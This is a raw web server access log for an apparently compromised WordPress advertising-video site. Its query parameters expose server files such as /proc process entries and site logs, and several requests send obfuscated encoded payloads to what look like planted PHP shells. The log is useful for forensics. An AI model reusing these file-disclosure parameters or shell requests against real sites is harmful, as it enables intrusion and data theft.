51.77.43.178 - - [10/Nov/2025:00:40:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sessionid&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:40:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/mountinfo&path=//proc/657 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:40:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory8/power HTTP/1.1" 200 3354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:40:56 +0000] "GET /66dghm18454.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:40:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_adj&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:40:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/personality&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.87.95.7 - - [10/Nov/2025:00:40:58 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//sys/module/multipath/coresize&path=//sys/module/multipath HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:40:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory0/node0 HTTP/1.1" 200 3948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:41:00 +0000] "GET /21myp13967.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:01 +0000] "GET /?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider HTTP/1.1" 200 8494 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory7/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/maps&path=//proc/657 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/setgroups&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/numa_maps&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.90.244.132 - - [10/Nov/2025:00:41:03 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//sys/kernel/slab/mnt_cache HTTP/1.1" 200 4024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.66.40 - - [10/Nov/2025:00:41:04 +0000] "GET /?products=1701710610 HTTP/1.1" 200 25805 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [10/Nov/2025:00:41:05 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383734352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353134352q3064366233653832616434656536613333373362323664663632316164626138222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:00:41:05 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/projid_map&path=//proc/657 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:05 +0000] "GET /82fpal22856.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:05 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory6/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [10/Nov/2025:00:41:05 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
216.73.216.50 - - [10/Nov/2025:00:41:05 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FIO%2FCompress%2FZip HTTP/1.1" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.214.238.178 - - [10/Nov/2025:00:41:06 +0000] "GET /our-works/tvc-calci/?path=//lib/python3.8/importlib/__pycache__ HTTP/1.1" 200 3309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/640/sessionid&path=//proc/640 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:07 +0000] "GET /286iok8336.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:41:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory10/power HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:08 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/mem&path=//proc/657 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_adj&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:10 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:11 +0000] "GET /269tlfv6179.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.83.178.66 - - [10/Nov/2025:00:41:11 +0000] "GET /our-works/tvc-calci/?path=//lib/python3.8/importlib/__pycache__ HTTP/1.1" 200 3309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:41:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory9/power HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:12 +0000] "GET /33qmw30759.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.210.223.61 - - [10/Nov/2025:00:41:13 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//run/atd.pid&path=//run HTTP/1.1" 200 2599 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:41:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory9/node0/power HTTP/1.1" 200 3363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:41:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings%2Fiso2022_kr.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings HTTP/1.1" 200 3001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:41:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/mountinfo&path=//proc/657 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score_adj&path=//proc/657 HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:15 +0000] "GET /156pmh8862.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/640/setgroups&path=//proc/640 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps_rollup&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory0/node0 HTTP/1.1" 200 3945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/schedstat&path=//proc/657 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:18 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score_adj&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:18 +0000] "GET /66dghm18454.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.213.85.234 - - [10/Nov/2025:00:41:19 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/tty/tty11 HTTP/1.1" 200 3088 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:41:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory4 HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:41:20 +0000] "GET /82fpal22856.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:41:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory4 HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.20.181.148 - - [10/Nov/2025:00:41:21 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//usr/lib/systemd/systemd-initctl&path=//usr/lib/systemd HTTP/1.1" 200 2618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:41:22 +0000] "GET /21myp13967.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:22 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sessionid&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/pagemap&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/pagemap&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:24 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stack&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory8/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:25 +0000] "GET /robots.txt HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:25 +0000] "GET /269tlfv6179.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/auxv&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/numa_maps&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.215.221.125 - - [10/Nov/2025:00:41:26 +0000] "GET /our-works/tvc-calci/?path=//usr/share/locale/bg HTTP/1.1" 200 2942 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:41:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory7 HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/setgroups&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:41:28 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383736382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353136382q3361333436333134623137323838643936653239306536303561613238323430222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:41:28 +0000] "GET /42axk18802.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stat&path=//proc/657 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:00:41:28 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput1%2Finput1%3A%3Acapslock%2Fdevice%2Fevent1%2Fsubsystem%2Fmouse1%2Fsubsystem%2Fmouse0%2Fsubsystem HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:41:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/patch_state&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory10/power HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.66.172 - - [10/Nov/2025:00:41:29 +0000] "GET /our-works/phu-long-corporate-video/?path=//usr/local HTTP/1.1" 200 3252 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:41:30 +0000] "GET /43xyx31473.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-frontend.error.log.4.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/patch_state&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_adj&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory7/node0/hugepages HTTP/1.1" 200 3060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:32 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:33 +0000] "GET /269tlfv6179.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/statm&path=//proc/657 HTTP/1.1" 200 2631 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.204.89.56 - - [10/Nov/2025:00:41:34 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/tty/tty11 HTTP/1.1" 200 3088 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:34 +0000] "GET /?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3615 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory0/power HTTP/1.1" 200 3354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/personality&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:36 +0000] "GET /82fpal22856.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/cgroup&path=//proc/657 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps_rollup&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:37 +0000] "GET /robots.txt HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/status&path=//proc/657 HTTP/1.1" 200 3084 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory4/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.210.204.255 - - [10/Nov/2025:00:41:39 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/kernel/slab/dentry HTTP/1.1" 200 4024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:41:39 +0000] "GET /66dghm18454.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/personality&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory7/power HTTP/1.1" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/projid_map&path=//proc/657 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
